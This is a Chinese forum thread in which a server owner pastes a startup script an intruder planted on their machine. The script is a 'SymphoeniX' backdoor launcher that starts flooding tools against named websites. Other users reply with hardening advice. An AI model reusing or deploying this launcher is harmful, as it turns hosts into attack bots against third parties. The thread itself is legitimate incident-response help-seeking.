急！急！急！大家帮我看看是不是服务器被攻击了。服务器被人改为开机启动如下代码！！

saiy828

#!/bin/sh

echo ""
echo "      -S y m p h o e n i X- is starting."
echo "           enhanced by SymphoeniX!      "
echo "[+] [SymphoeniX b0td00r] Hiden  from the daemon........ ."
echo ""

# -editla..dir mane ko letakkan bot ko
   cd /usr/lib/libsh/utilz/dos;
   vadimI www.g4techtv.com 53 www.symphoenix.com &
   vadimI www.ptpl.edu.my 53 www.symphoenix.com &
   vadimI www.kutpm.edu.my 53 www.symphoenix.com &
   echo "[+] EgGDrop b0td00r   ... [done]"
   echo ""
    cd /usr/lib/libsh/utilz/tembak;
    symphoenix www.kutpm.edu.my 53 &

echo "* m i s s i o n  a c c o m p l i s h e d *"
echo ""
sleep 2
echo "Enj0y y0uR b0td00r by -S y m p h o e n i X"
echo ""
那位可以看懂这段代码！！

Yuri

加强ROOT口令,去掉无用的用户,加强防火墙,打上系统补丁,加强日志管理,还有检查一下系统的服务看有没有留下后门

attiseve

不像好东西！

saiy828

我天天换密码，而且密码就我一人知道。我发现它是用了调度执行了。就算我把这个文件删了到了时间它还会有的，现在我把这个文件保留，把内容清理了。我在观察。
那位兄弟遇到过这问题近来看看。